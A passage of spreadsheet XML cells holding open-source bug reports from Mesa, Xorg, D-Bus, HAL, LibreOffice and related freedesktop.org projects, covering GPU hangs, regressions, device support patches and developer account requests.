    <t>Calling _mesa_compressed_image_address with invalid parameter in texcompress_fxt1.c triggers a Mesa internal error</t>
  </si>
  <si>
    <t>In functions texstore_rgba_fxt1 and texstore_rgb_fxt1(texcompress_fxt1.c) calling 
_mesa_compressed_image_address with mesaFormat set to
GL_COMPRESSED_RGB_FXT1_3DFX or GL_COMPRESSED_RGBA_FXT1_3DFX. From the context
it is a mistake. Here it should pass a Mesa internal format or it will trigger
a mesa error.
    107    dst = _mesa_compressed_image_address(dstXoffset dstYoffset 0
    108                                         GL_COMPRESSED_RGB_FXT1_3DFX
                                                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    109                                         texWidth (GLubyte *) dstAddr)</t>
  </si>
  <si>
    <t>DRI-43076</t>
  </si>
  <si>
    <t>[gm45] garbage in batch buffer</t>
  </si>
  <si>
    <t>I believe that I run 2.16.0 with --enable-sna and after upgrade to 2.17.0 suddenly (in middle of X11 session) the session of gnome-shell crashed and I was unable to log into gnome-shell again. After investigation it turned out that system fallback to llvm pipe cause of which turned out to be hanged GPU. The restarts did not helped (the system hanged almost immediately after logging into gnome-shell).
After investigation of cause I tried to downgrade what I upgraded recently. Unfortunately I wasn't able to get it running until disabling sandy bridge enhancements.
Kernel: 3.2.0-rc2 and 3.2.0-rc1
xorg-server: 7.11.2 and 7.10.4
libdrm: 2.4.27
mesa: 8.0.0 and 8.0.1
PS. The mandatory /debug/dri/0/i965_errors_something as well as exact dmesg I'll post later on. I cannot spent any more time today and in rush I saved it in tmpfs.</t>
  </si>
  <si>
    <t>HAL-19339</t>
  </si>
  <si>
    <t>new FDI for Sandisk Sansa Clip version 2</t>
  </si>
  <si>
    <t>Created attachment 21569
new Sansa Clip version 2 FDI
I have created an FDI for the new version of Sansa Clip since the usb.product_id seem to have changed for the new HW version. 
The Clip also has gotten much more capabilities like ogg and flac support with the new firmware. This is true for both versions so I guess an update for version 1 would also be needed. 
My Clip does not have an PLAYLIST folder so I removed that from the playlist path.</t>
  </si>
  <si>
    <t>ryz</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-7659</t>
  </si>
  <si>
    <t>Can you add new components to the D-Bus Bugzilla</t>
  </si>
  <si>
    <t>D-Bus has been split up into components it would be nice to get these set up in
bugzilla.  The components are:
core - hp@redhat.com Cc: johnp@redhat.com
glib - robot101@debian.org Cc: johnp@redhat.com
qt - thiago.macieira@trolltech.com
python - johnp@redhat.com Cc: robot101@debian.org
java - dbus@matthew.ath.cx
perl - not sure the maintainers e-mail will get back to you on that</t>
  </si>
  <si>
    <t>MESA-79885</t>
  </si>
  <si>
    <t>commit b52a530 (gallium/egl: st_profiles are build time decision treat them as such) broke egl</t>
  </si>
  <si>
    <t>since commit b52a530 I get
# es2_info 
es2_info: es2_info.c:158: make_x_window: Assertion `num_configs &gt; 0' failed.
Aborted
The feature defines look fine but still something goes wrong.</t>
  </si>
  <si>
    <t>marvin24</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-10103</t>
  </si>
  <si>
    <t>Again XF86AudioEject bug in inet.</t>
  </si>
  <si>
    <t>inet(cymotionlinux) contains invalid keysym which probably should be replaced with XF86Eject. Patch will be attached.</t>
  </si>
  <si>
    <t>XORG-100276</t>
  </si>
  <si>
    <t>xf86-video-amdgpu-1.3.0 segfaults with a rotated screen (regression caused by commit ad53635af1)</t>
  </si>
  <si>
    <t>Created attachment 130307
xorg.log
There's a regression between xf86-video-amdgpu-1.2.0 and 1.3.0 that causes a segfault (xorg.log attached).
If I take 1.3.0 and revert commit ad53635af1 everything's fine.
It only happens when a monitor is rotated (I have it configured inside xorg.conf).</t>
  </si>
  <si>
    <t>timon37</t>
  </si>
  <si>
    <t>XORG-16259</t>
  </si>
  <si>
    <t>Gnome panel flickers through into fullscreen SDL games</t>
  </si>
  <si>
    <t>Short repro steps (using ubuntu hardy):
1. Add System Monitor as a gnome panel.
2. Install and run the game supertux (or basically any other fullscreen SDL game).
Detailed repro steps (for non-ubuntu users who want to see the bug):
1. Boot Hardy live CD.
2. Right click gnome panel in the top gray area maybe 2 cm left of the blue help icon.
3. Select the Add to Panel menu item
4. Select System Monitor (it's quite far down the list with greenish icon).
5. Add universe as source in apt (use System::Administration::Software Sources and check the checkbox called Universe).
6. Run sudo apt-get install supertux to install a SDL game.
7. Select Applications::Games::Supertux2
Expected results:
Gnome panel items should not engage in Z-order fighting with supertux while supertux is running in fullscreen.
Actual results:
Gnome insists on updating the panel CPU meter and also some other thing so basically two big black boxes appear along the top of the screen inside supertux. They just randomly flicker and it makes the game more or less unplayable.
Note 1: The same bug repros other games for instance you can try installing the Extreme Tux Racer game from the etracer package in Ubuntu.
Note 2: This is not a driver bug. I'm using a Intel X3100 GMA card with a 965GM chipset and this bug was confirmed by a guy who has a ati radeon 9550 card.
Note 3: If I set System::Preferences::Appearence::Visual Effects to None then the bug goes away. This is the way you turn of compiz in ubuntu so that's why I think this is a compiz bug.
Note 4: The original ubuntu bug report was filed here: https://bugs.launchpad.net/ubuntu/+source/meta-gnome2/+bug/237955</t>
  </si>
  <si>
    <t>MEDIA-PLAYER-INFO-51097</t>
  </si>
  <si>
    <t>[PATCH] add HP Veer</t>
  </si>
  <si>
    <t>Created attachment 63048
mpi file for HP Veer
At least the AT&amp;T variant others may have different USB IDs.</t>
  </si>
  <si>
    <t>MESA-27216</t>
  </si>
  <si>
    <t>Assignment with a function call in an if statement causes an assertion failure</t>
  </si>
  <si>
    <t>This GLSL fragment shader causes an assertion failure from Mesa:
 void
 main ()
 {
   float thing
   if ((thing = sqrt (5.0)) &gt; 1.0)
     gl_FragColor = vec4 (1.0 0.0 0.0 1.0)
 }
The assertion is assert(index &gt;= 0) in storage_to_src_reg in slang_emit.c
Taking away the assignment or the function call avoids the problem. As does moving the expression to outside the if condition.</t>
  </si>
  <si>
    <t>WOCKY-27414</t>
  </si>
  <si>
    <t>pubsub: subscription change and node deletion notifications retrieving subscribers and affiliates of a node</t>
  </si>
  <si>
    <t>The attached branch adds signals for subscription state changes and node deletion notifications. It also adds API for node owners to retrieve the list of subscribers to a node and the list of affiliates of a node.</t>
  </si>
  <si>
    <t>DBUS-7960</t>
  </si>
  <si>
    <t>Weird D-BUS problem with strtod usage</t>
  </si>
  <si>
    <t>When I run make check on Solaris I see this output - note failed test:
make[3]: Entering directory
`/export/home/jds/packages/BUILD/dbus-test/dbus-0.62/dbus'
Test data in ../test/data
dbus-test: running string tests
dbus-test: checking for memleaks
dbus-test: running sysdeps tests
Failed to parse 0xff correctly got: 0.000000
The problem seems to be with the strtod call that we see in the
dbus/dbus-sysdeps.c code.  
I created a small test program containing a call to strtod. If it is compiled
with c99 compiler then strtod recognizes a hex string as a float but if cc is
used strtod recognizes a hex string as an integer.
I tried compiling dbus with c99 compiler. This worked except for the source file
dbus-sysdeps-utils.c which I had to compile by hand with cc compiler. Then make
check ran successfully.
I am not sure what we want to do about this or if it is Solaris specific. 
Perhaps this is compiler (or compiler option) specific?
The code that calls strtod for this failed test is ascii_strtod function in the
dbus/dbus-sysdeps.c code and this is only built with --enable-tests is specified
(note #ifdef DBUS_BUILD_TESTS) and is not part of the delivered dbus code.
However I also notice that dbus-send calls strtod () in the append_arg
function so perhaps this test is highlighting a bug that could appear there?
When I comment out this failing test and build with cc then make check pases. 
Perhaps we should be using a different function than strtod that doesn't
have compiler issues like this?  Or should we use special compiler options when
building certain files in D-BUS do you think?</t>
  </si>
  <si>
    <t>XORG-55395</t>
  </si>
  <si>
    <t>gnome-shell 3.6 BadDrawable  with xf86-video-intel sna</t>
  </si>
  <si>
    <t>gnome-shell with the new screenshield in the 3.5/3.6 series crashes with the 1.20.x drivers with SNA enabled when the screen locks on the timer.
related gnome bug https://bugzilla.gnome.org/show_bug.cgi?id=682173</t>
  </si>
  <si>
    <t>fosero</t>
  </si>
  <si>
    <t>XORG-1053</t>
  </si>
  <si>
    <t>Ugly artifacts when using composite with Openbox Enlightenment XFCE FVWM</t>
  </si>
  <si>
    <t>This happens with both the proprietary NVIDIA drivers and the open source nv
driver. I get this after running xcompmgr -nc (or any other valid parameters).
It's mostly jumbled text but there are other problems too. Screenshot attatched.</t>
  </si>
  <si>
    <t>POPPLER-12000</t>
  </si>
  <si>
    <t>Patch against CVE-2007-3387 is needed</t>
  </si>
  <si>
    <t>Are there any plan solving CVE-2007-3387 in the near future for both 0.4.x and 0.6.x branches?</t>
  </si>
  <si>
    <t>fundawang</t>
  </si>
  <si>
    <t>MESA-31265</t>
  </si>
  <si>
    <t>r600g: Adobe Flash Plugin crashes (Regression)</t>
  </si>
  <si>
    <t>When using r600g with Firefox + Adobe flash plugin. The flash plugin crashes when switching to fullscreen mode second time.
Steps to reproduce: Go to youtube watch a video enter fullscreen mode leave fulscreen mode enter fullscreen mode a second time now Firefox greats you with a message that the flash plugin has crashed.
Bisected it to commit: 8ad9d83fdfc609303cebba3d811064b91aed6b0b (r600g: Destroy the blitter)</t>
  </si>
  <si>
    <t>HAL-20016</t>
  </si>
  <si>
    <t>please add iriver s10 to portable media players diff file added</t>
  </si>
  <si>
    <t>Created attachment 22708
provides iriver s10 capabilities into hal-info
I've attached a diff file which provides into:
10-usb-music-players.fdi
details for the iriver s10 player could you add it into mainstream?</t>
  </si>
  <si>
    <t>giulivo.navigante</t>
  </si>
  <si>
    <t>MESA-85377</t>
  </si>
  <si>
    <t>lp_test_format failure with llvm-3.6</t>
  </si>
  <si>
    <t>mesa: bbe93161e7781c303de7d83bc601601f675b56f9 (master 10.4.0-devel)
$ ./build/linux-x86_64-debug/bin/lp_test_format 
Testing PIPE_FORMAT_B8G8R8A8_UNORM (float) ...
Testing PIPE_FORMAT_B8G8R8A8_UNORM (unorm8) ...
Testing PIPE_FORMAT_B8G8R8X8_UNORM (float) ...
Testing PIPE_FORMAT_B8G8R8X8_UNORM (unorm8) ...
Testing PIPE_FORMAT_A8R8G8B8_UNORM (float) ...
Testing PIPE_FORMAT_A8R8G8B8_UNORM (unorm8) ...
Testing PIPE_FORMAT_X8R8G8B8_UNORM (float) ...
Testing PIPE_FORMAT_X8R8G8B8_UNORM (unorm8) ...
Testing PIPE_FORMAT_B5G5R5A1_UNORM (float) ...
Testing PIPE_FORMAT_B5G5R5A1_UNORM (unorm8) ...
Testing PIPE_FORMAT_B4G4R4A4_UNORM (float) ...
Testing PIPE_FORMAT_B4G4R4A4_UNORM (unorm8) ...
Testing PIPE_FORMAT_B5G6R5_UNORM (float) ...
Testing PIPE_FORMAT_B5G6R5_UNORM (unorm8) ...
Testing PIPE_FORMAT_R10G10B10A2_UNORM (float) ...
Testing PIPE_FORMAT_R10G10B10A2_UNORM (unorm8) ...
Testing PIPE_FORMAT_L8_UNORM (float) ...
Testing PIPE_FORMAT_L8_UNORM (unorm8) ...
Testing PIPE_FORMAT_A8_UNORM (float) ...
Testing PIPE_FORMAT_A8_UNORM (unorm8) ...
Testing PIPE_FORMAT_I8_UNORM (float) ...
Testing PIPE_FORMAT_I8_UNORM (unorm8) ...
Testing PIPE_FORMAT_L8A8_UNORM (float) ...
Testing PIPE_FORMAT_L8A8_UNORM (unorm8) ...
Testing PIPE_FORMAT_L16_UNORM (float) ...
Testing PIPE_FORMAT_L16_UNORM (unorm8) ...
Testing PIPE_FORMAT_UYVY (float) ...
Testing PIPE_FORMAT_UYVY (unorm8) ...
Testing PIPE_FORMAT_YUYV (float) ...
Testing PIPE_FORMAT_YUYV (unorm8) ...
Testing PIPE_FORMAT_R32_FLOAT (float) ...
Testing PIPE_FORMAT_R32_FLOAT (unorm8) ...
Testing PIPE_FORMAT_R32G32_FLOAT (float) ...
Testing PIPE_FORMAT_R32G32_FLOAT (unorm8) ...
Testing PIPE_FORMAT_R32G32B32_FLOAT (float) ...
Testing PIPE_FORMAT_R32G32B32_FLOAT (unorm8) ...
Testing PIPE_FORMAT_R32G32B32A32_FLOAT (float) ...
Segmentation fault (core dumped)
(gdb) bt
#0  0x00007ffff7ff7004 in ?? ()
#1  0x00007fffffffe2c0 in ?? ()
#2  0x0000000000457334 in test_format_float (verbose=0 fp=0x1a89a98 desc=0x1a89a10) at src/gallium/drivers/llvmpipe/lp_test_format.c:168
Backtrace stopped: frame did not save the PC
(gdb) frame 2
#2  0x0000000000457334 in test_format_float (verbose=0 fp=0x1a89a98 desc=0x1a89a10) at src/gallium/drivers/llvmpipe/lp_test_format.c:168
168	               fetch_ptr(unpacked test-&gt;packed j i)
(gdb) print test
$1 = (const struct util_format_test_case *) 0x0</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-7374</t>
  </si>
  <si>
    <t>Hello
 I'd like to contribute with xkeyboard-config project with some alternative
layouts in particular with commonly used Esperanto layout variants for the
latin keyboards (altgr variants) and with new experimental Dvorak-style
Brazilian keyboards made by Ari Caldeira (see the Teclado Brasileiro site).
Also I can write some documentation/correct some bugs if I have the will.
 The generated SSH and GPG keys follow.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.2.2 (GNU/Linux)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=ViDZ
-----END PGP PUBLIC KEY BLOCK-----
ssh-dss
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
hdante@stoneoftears</t>
  </si>
  <si>
    <t>hdante</t>
  </si>
  <si>
    <t>XORG-11653</t>
  </si>
  <si>
    <t>unused local variable ret in GL/glx/glxdri.c</t>
  </si>
  <si>
    <t>The ret variable in glxDRIEnterVT is not used.</t>
  </si>
  <si>
    <t>DRI-82841</t>
  </si>
  <si>
    <t>[BYT-M Regression]S3/S4 sauses  WARNING: CPU: 0 PID: 987 at drivers/gpu/drm/i915/intel_dp.c:1223 intel_dp_probe_oui.part.14+0x12/0xb9 [i915]()</t>
  </si>
  <si>
    <t>Created attachment 104936
dmesg
==System Environment==
--------------------------
Regression: Yes.
Result on -next-queued(5193109cd669c7990b043a7187548546c16f8af3) was System unable resume from S3/S4 (Bug 81948)
Non-working platforms: BYT-M
==kernel==
--------------------------
origin/drm-intel-nightly: 49ceddc7b3b0e3f7eb21b9fb4c9b840cff630047(fails)
    drm-intel-nightly: 2014y-08m-19d-19h-02m-49s integration manifest
origin/drm-intel-next-queued: 3f72c7b12f1a81a32fd37216b3382e6fe46a7184(fails)
    drm/i915/bdw: Disable execlists by default
origin/drm-intel-fixes: 1a125d8a2c22b11741fc47d4ffcf7a5ffa044dd3(fails)
    drm/i915: don't try to retrain a DP link on an inactive CRTC
==Bug detailed description==
-----------------------------
S3/S4 sauses  WARNING: CPU: 0 PID: 987 at drivers/gpu/drm/i915/intel_dp.c:1223 intel_dp_probe_oui.part.14+0x12/0xb9 [i915]()
System unable resume from S3/S4 before(Bug 81948)
Output:
root@x-bytm02:~# dmesg -r|egrep |grep drm
root@x-bytm02:~# echo 0 &gt; /sys/class/rtc/rtc0/wakealarm  echo +10 &gt; /sys/class/rtc/rtc0/wakealarm echo mem &gt; /sys/power/state
root@x-bytm02:~# dmesg -r|egrep |grep drm                                                                 
 [   57.438319] WARNING: CPU: 0 PID: 987 at drivers/gpu/drm/i915/intel_dp.c:1223 intel_dp_probe_oui.part.14+0x12/0xb9 [i915]()
[   57.438348] Modules linked in: dm_mod iTCO_wdt snd_hda_codec_hdmi iTCO_vendor_support snd_hda_codec_conexant snd_hda_codec_generic pcspkr i2c_i801 snd_hda_intel lpc_ich snd_hda_controller r8169 mfd_core snd_hda_codec snd_hwdep snd_pcm snd_timer snd soundcore battery wmi iosf_mbi ac acpi_cpufreq uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core v4l2_common videodev i915 button video drm_kms_helper drm cfbfillrect cfbimgblt cfbcopyarea
[   57.438353] CPU: 0 PID: 987 Comm: kworker/u8:2 Not tainted 3.17.0-rc1_drm-intel-nightly_09fcef_20140819+ #1580
[   57.438492]  [] ? drm_helper_hpd_irq_event+0x60/0xe8 [drm_kms_helper]
[   57.438507]  [] ? __i915_drm_thaw+0x121/0x16a [i915]
[   57.463714] WARNING: CPU: 3 PID: 987 at drivers/gpu/drm/i915/intel_dp.c:1294 edp_panel_vdd_off+0x33/0x58 [i915]()
[   57.463742] Modules linked in: dm_mod iTCO_wdt snd_hda_codec_hdmi iTCO_vendor_support snd_hda_codec_conexant snd_hda_codec_generic pcspkr i2c_i801 snd_hda_intel lpc_ich snd_hda_controller r8169 mfd_core snd_hda_codec snd_hwdep snd_pcm snd_timer snd soundcore battery wmi iosf_mbi ac acpi_cpufreq uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core v4l2_common videodev i915 button video drm_kms_helper drm cfbfillrect cfbimgblt cfbcopyarea
[   57.463747] CPU: 3 PID: 987 Comm: kworker/u8:2 Tainted: G        W      3.17.0-rc1_drm-intel-nightly_09fcef_20140819+ #1580
[   57.463910]  [] ? drm_helper_hpd_irq_event+0x60/0xe8 [drm_kms_helper]
[   57.463926]  [] ? __i915_drm_thaw+0x121/0x16a [i915]
Reproduce steps:
-------------------------
==Reproduce steps==
---------------------------- 
1. echo mem &gt;/sys/power/state
2. Press power button</t>
  </si>
  <si>
    <t>XORG-8144</t>
  </si>
  <si>
    <t>X input methods broken with --enable-loadable-i18n</t>
  </si>
  <si>
    <t>When compiling libx11 with --enable-loadable-i18n xterm still fails to open X 
the X input methods which means dead keys like Â¨ doesn't work correctly.  I'll 
attach a patch which solves this problem.</t>
  </si>
  <si>
    <t>MESA-52209</t>
  </si>
  <si>
    <t>lp_test_format regression</t>
  </si>
  <si>
    <t>3469715a8a171512cf9b528702e70393f01c6041 is the first bad commit
commit 3469715a8a171512cf9b528702e70393f01c6041
Author: JosÃ© Fonseca 
Date:   Fri Jul 13 18:09:30 2012 +0100
    gallivmdrawllvmpipe: Support wider native registers.</t>
  </si>
  <si>
    <t>AVAHI-5328</t>
  </si>
  <si>
    <t>avahi-daemon</t>
  </si>
  <si>
    <t>AVAHI</t>
  </si>
  <si>
    <t>dbus 0.60 check has small typo</t>
  </si>
  <si>
    <t>--- avahi/avahi-daemon/dbus-protocol.c.orig     2005-12-12 17:41:45.000000000 -0800
+++ avahi/avahi-daemon/dbus-protocol.c  2005-12-12 17:42:31.000000000 -0800
@@ -10317 +10317 @@
     if (dbus_bus_request_name(
             server-&gt;bus
             AVAHI_DBUS_NAME
-#if (DBUS_VERSION_MAJOR == 0) &amp;&amp; (DBUS_VERSION_MINOR &gt;= 60)
+#if (DBUS_VERSION_MAJOR == 0) &amp;&amp; (DBUS_VERSION_MINOR &lt;= 60)
             DBUS_NAME_FLAG_DO_NOT_QUEUE
 #else
             DBUS_NAME_FLAG_PROHIBIT_REPLACEMENT</t>
  </si>
  <si>
    <t>lathiat</t>
  </si>
  <si>
    <t>bobk</t>
  </si>
  <si>
    <t>MESA-96955</t>
  </si>
  <si>
    <t>SSH Account Request for Mesa related development</t>
  </si>
  <si>
    <t>Created attachment 125101
GPG Public Key
My GPG Public Key
Username: elongbug
Real Name: Gwan-gyeong Mun
Email: elongbug@gmail.com</t>
  </si>
  <si>
    <t>elongbug</t>
  </si>
  <si>
    <t>GTK-QT_ENGINE-7314</t>
  </si>
  <si>
    <t>INSTALL and README are broken</t>
  </si>
  <si>
    <t>The current INSTALL (the README is blank) tells you to ./configure &amp;&amp; make &amp;&amp; 
make install but the correct way would be something like:
cp Makefile.cvs Makefile
chmod +x Makefile
make
./configure &amp;&amp; make &amp;&amp; make install</t>
  </si>
  <si>
    <t>juanmedin</t>
  </si>
  <si>
    <t>TELEPATHY-42503</t>
  </si>
  <si>
    <t>Race in tp_channel_dispatch_operation_claim_with_async() and context_accept()</t>
  </si>
  <si>
    <t>In the case we are both an observer and an handler it common in observe_channels() to claim them. In that case we should start handling from the claim_cb and we should NOT get handle_channels(). So typically code would do:
  tp_channel_dispatch_operation_claim_with_async (dispatch_operation self
      claim_cb user_data)
  tp_observe_channels_context_accept (context)
Which would be correct if tp_channel_dispatch_operation_claim_with_async() was calling Claim dbus call directly. But since it first do a tp_proxy_prepare_async() on the DO the return from dbus call done in tp_observe_channels_context_accept() gets to MC first and it will then dispatch the channel to anyone able to.</t>
  </si>
  <si>
    <t>DRI-99977</t>
  </si>
  <si>
    <t>[SNB iommu] GPU HANG: TLB page VTD translation generated an error</t>
  </si>
  <si>
    <t>Created attachment 129939
GPU error dump
Architecture: amd64
Machine: Thinkpad T520
Linux: 4.10.0-rc8git+ (vanilla master)
Distro: Debian Unstable
Mesa: 13.0.5-1 (distro)
libdrm: 2.4.74-1 (distro)
X intel driver: 2:2.99.917+git20161206-1 (distro)
Bug manifests reliably around 30sec after starting up the game and then every few minutes thereafter until the machine finally locks up hard (as in not-even-sysrq-hard). GPU dump is attached dmesg follows.</t>
  </si>
  <si>
    <t>jckn</t>
  </si>
  <si>
    <t>MODEMMANAGER-102231</t>
  </si>
  <si>
    <t>MBIM modem failing with MaxActivatedContexts after suspend/resume cycle</t>
  </si>
  <si>
    <t>Aleksander and I discussed this on IRC but I'm logging a bug too to make sure it doesn't get forgotten about.
My HP lt4120 modem (in MBIM mode) will after a suspend/resume cycle no longer be able to connect:
[root@sloth ~]# mmcli -m 28 --simple-connect=apn=telenor.smart
error: couldn't connect the modem: 'GDBus.Error:org.freedesktop.libmbim.Error.Status.MaxActivatedContexts: MaxActivatedContexts'
The modem was in all likelihood connected when the machine was suspended (as the WWAN connection in NM has connection.autoconnect: yes).
Even though the modem isn't connected from MM/NM's point of view from the MBIM point of view it appears to be:
[root@sloth ~]# mbimcli -d /dev/cdc-wdm0 -p --query-connection-state
[/dev/cdc-wdm0] Connection status:
              Session ID: '0'
        Activation state: 'activated'
        Voice call state: 'none'
                 IP type: 'ipv4-and-ipv6'
            Context type: 'internet'
           Network error: 'unknown'
I can bring it back to life by using mbimcli to disconnect it:
[root@sloth ~]# mbimcli -d /dev/cdc-wdm0 -p --disconnect
[/dev/cdc-wdm0] Successfully disconnected
[/dev/cdc-wdm0] Connection status:
              Session ID: '0'
        Activation state: 'deactivated' 
        Voice call state: 'none' 
                 IP type: 'default'
            Context type: 'internet'
           Network error: 'unknown'
[root@sloth ~]# mmcli -m 28 --simple-connect=apn=telenor.smart
successfully connected the modem
It would be nice if MM gains the ability to do this on its own at suspend or resume time (or both).
Tore</t>
  </si>
  <si>
    <t>tore</t>
  </si>
  <si>
    <t>DBUS-12675</t>
  </si>
  <si>
    <t>[patch] replace invalid assert in dbus_g_proxy_begin_call_internal</t>
  </si>
  <si>
    <t>We've had several core dumps for this g_assert() and I found out why it triggers:  pending == NULL can be returned when the connection has been disconnected (it's in the API documentation). I'll attach a patch.</t>
  </si>
  <si>
    <t>MESA-69203</t>
  </si>
  <si>
    <t>[NVC1] Kernel 3.11 - Xorg hangs immediately after invocation</t>
  </si>
  <si>
    <t>System:
(B)LFS i686-pc-linux-gnu
kernel 3.10.10 (with its nouveau module)
xorg-server v1.14.1
libdrm: git 2013-07-17 18:44 EST
Xorg_nouveau: git 2013-07-17 18:46 EST
Mesa v9.1.1
Motherboard:  ASUS P5E-VM HDMI with Intel G35/ICH9R
 intel Core2Duo E8400@3.0GHz 4 GB.
Graphics card:  EVGA GeForce GT430 active  connected to
Monitor: ASUS VE258
---------------------------------------------------------
Description
1.  Boot up system to level 3 (text/VGA/console mode)
2.  Start Xorg (also known as X X11)
3.  The system hangs.
  You can see the mouse pointer.  You can manipulate it but that's all.
  The only way out is to hard reboot the machine.
----------------------------------------------------------
Comments
1.  Up to and including 3.10.10 Xorg behaves normally.
2.  A git bisect procedure starting with
 git bisect good v3.10
 git bisect bad v3.11-rc7
reaches the last bisect step.  At that point
after compile and reboot the system hangs somewhere in the boot-up sequence.
git show
commit 5ee86c4190f9e19a9e13906389069c73d7f75bfb
Author: Ben Skeggs 
Date:   Mon Jul 1 14:32:42 2013 +1000
    drm/nve0-/gr: some new gpc registers can have multiple copies
    GK110 exposes more than one and needs to be dealt with in the ctxsw
    ucode just like the TPC sets are.
    Broadcast is at +0xe00.
 ...
cat .git/HEAD                                 # For confirmation
5ee86c4190f9e19a9e13906389069c73d7f75bfb
Please note that at this point the bisect is at 0 revisions left 1 step.
Unfortunately this commit bring the additional problem the boot hung.
3. See attachments
Xorg.0.log-3.10.10good
Xorg.0.log-3.11bug                      # The most telling as to the problem
config-3.10.10
config-3.11
4. In trying to narrow down to the exact commit responsible for the
 subject bug I created a timeline of events related to the problems
 befalling my system.
A-----a---b---c---d---e---f---g-----B
(to the left:  earlier in time)
Note:  the line component of the word timeline is from a bisect standpoint.
       Actually there are a lot of branches and merges along the way.
Legend:
A: v3.10      X11 Good (a good bisect good start)
B: v3.11-rc1  X11 Bug  (a good bisect bad start)
a: 791dc143   X11 Good                                          Jun 27 17:35
b: 7c397cd9   X11 Good                                          Jun 28 14:24
c: 56fbd2b6   Hang on boot-up                                   May 2 12:37
d: c03ff9e8   Hang on boot-up                                   Jul 1 10:54
e: 5ee86c41   Hang on boot-up                                   Jul 1 14:32
f: 70f824ac   X11 starts but cursor is flaky (and soon lost)    Jul 1 14:48
g: 8f6fe267   X11 Bug                                           Jul 4 13:03
Commit references:
791dc143ed2c441f5202d8721609d94dce9fcf88
Author: Maarten Lankhorst
drm/nvd0-/disp: handle case where display engine is missing/disabled
Signed-off-by: Ben Skeggs
7c397cd97b8f46659698396b420bd48c3e6703e6
Author: Joonyoung Shim
drm: add mmap function to prime helpers
Signed-off-by: Joonyoung Shim and Dave Airlie
56fbd2b65446d4fb4df7770c49a70d563b7569c9
Author: Ben Skeggs
drm/nvf0/fifo: enable support
Signed-off-by: Ben Skeggs
[drivers/gpu/drm/nouveau]
c03ff9e8fa5fc0186158b99a89f613325ff352cf
Author: Ben Skeggs
drm/nvc0-/gr: pull out a group of separately context-switched gpc regs
Signed-off-by: Ben Skeggs
[drivers/gpu/drm/nouveau]
commit 5ee86c4190f9e19a9e13906389069c73d7f75bfb
Author: Ben Skeggs
drm/nve0-/gr: some new gpc registers can have multiple copies
Signed-off-by: Ben Skeggs
[drivers/gpu/drm/nouveau]
70f824ac8c369194e9499c59e687c6aa8b1a10c8
Author: Ben Skeggs
drm/nvc0-/gr: tpc regs a subset of gpc add separate list for gpc/unk regs
Signed-off-by: Ben Skeggs 
[drivers/gpu/drm/nouveau]
8f6fe26745d39299d43d79dd7ba9838517624c3f
Author: Ben Skeggs
drm/nvf0/gr: build cs ucode for GK110
Signed-off-by: Ben Skeggs
[drivers/gpu/drm/nouveau]
CONCLUSION
The bug was introduced and is lurking in the nouveau code of the official release 3.11.
The NVidia GT430 uses the nouveau driver so it is affected as described
by the subject bug.
Note:  There is a fix gpc hardware regression in the nouveau branch:
 a0b7ebfb39bf80078d12bd1a46ec40d0d0dbdeef
including some patches.
Apparently the corresponding mainline commit is
 d2989b534ef6834ebf2425aecc040b894b567c91
but it doesn't seem to affect (positively) the problem commit
 5ee86c4190f9e19a9e13906389069c73d7f75bfb
(nor can one test it as long as the system hangs at boot!)</t>
  </si>
  <si>
    <t>alupu01</t>
  </si>
  <si>
    <t>LIBREOFFICE-58712</t>
  </si>
  <si>
    <t>Terms necessary for the translate are not available</t>
  </si>
  <si>
    <t>LOdev 4.0.0.0.beta2+ (Build ID: 835cae7e323b9831d11f5f4957933728f561e71)
Menu 'Tools &gt; Customize' Window 'Keyboard &gt; Functions &gt; Category: Function'
Terms necessary for the translate (including for English) are not available:
--
Application (ÐŸÑ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ðµ) &gt; .uno:TemplateManager
Edit (ÐŸÑ€Ð°Ð²ÐºÐ°) &gt; .uno:PasteOnly .uno:PastOnlyFormula .uno:PasteOnlyText .uno:PasteOnlyValue
Format (Ð¤Ð¾Ñ€Ð¼Ð°Ñ‚) &gt; .uno:ClorScaleDialog .uno:DataBarDialog
Drawing (Ð Ð¸ÑÑƒÐ½Ð¾Ðº) &gt; .uno:DeleteShapeHyperlink .uno:EditShapeHyperlink
Graphic (Ð“Ñ€Ð°Ñ„Ð¸Ñ‡ÐµÑÐºÐ¸Ð¹ Ð¾Ð±ÑŠÐµÐºÑ‚) &gt; .uno:ExernalEdit
Chart (Ð”Ð¸Ð°Ð³Ñ€Ð°Ð¼Ð¼Ð°) &gt; .uno:ExportAsGraphic
--
P.S. You can see this in Calc.</t>
  </si>
  <si>
    <t>LIBREOFFICE-86203</t>
  </si>
  <si>
    <t>Empty spaces in special characters dialog selection grid (no filtering of unavailable characters)</t>
  </si>
  <si>
    <t>Created attachment 109344
Screenshot of empty spaces in the special characters dialog
The Special Characters dialog contains a grid of characters at the bottom of which are a lot of empty squares (where characters would normally be present).
Steps to Reproduce:
1. Open Libreoffice Writer.
2. Click on the Special Characters button in the toolbar.
3. Scroll down to the bottom of the symbols grid.
Current Behaviour:
There are many blank/empty squares towards the bottom of the symbols grid.
Expected Behaviour:
The user should only be able to scroll down to the last symbol in the grid and no further.
I have attached a screenshot to show the problem. As can be seen in the screenshot I only scrolled about 3/4 of the way down and the rest were all empty squares. I am not sure whether this was done intentionally but it seems a bit strange to have lots of empty space for the user to scroll through.
Tested with Libreoffice:
Version: 4.4.0.0.alpha2+
Build ID: 98f9baa5253f7bb8034f148519f31f548b1452fa
TinderBox: Linux-rpm_deb-x86_64@46-TDF Branch:master Time: 2014-11-12_00:13:54</t>
  </si>
  <si>
    <t>gabsd84</t>
  </si>
  <si>
    <t>MESA-17327</t>
  </si>
  <si>
    <t>[915 classic] Mip-maps are corrupted when resizing a window</t>
  </si>
  <si>
    <t>Created attachment 18549
Test-case that demonstrates the breakage
Unfortunately I can't be very specific about this bug but it seems that when the associated X window to a GL context is resized mip-maps are almost always corrupted.
This does not seem to affect GLUT applications (thus the difficulty I'm having in producing a test case) but it does affect Clutter ( http://clutter-project.org/ ) projects.
Attached is a small annotated clutter application that demonstrates this breakage. This doesn't happen in Mesa 7.0.</t>
  </si>
  <si>
    <t>chrislord.net</t>
  </si>
  <si>
    <t>XORG-688</t>
